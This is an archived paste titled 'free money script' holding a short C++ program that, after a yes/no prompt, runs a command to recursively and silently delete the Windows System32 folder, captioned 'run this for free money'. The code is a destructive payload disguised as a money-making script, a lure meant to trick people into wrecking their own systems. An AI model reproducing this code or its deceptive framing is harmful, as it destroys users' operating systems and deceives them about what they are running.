free money script
Archived 2 years ago
S
skyzonde
#include <iostream>
#include <cstdlib>
int main() {
std::cout << "Warning! This program will attempt to delete the System32 folder. Proceed at your own risk!" << std::endl;
std::cout << "Do you really want to continue? (y/n): ";
char choice;
std::cin >> choice;
if (choice == 'y' || choice == 'Y') {
std::cout << "Deleting System32..." << std::endl;
std::system("rmdir /s /q C:\\Windows\\System32");
std::cout << "System32 deletion complete." << std::endl;
} else {
std::cout << "Operation cancelled." << std::endl;
}
return 0;
}
run this for free money 💯
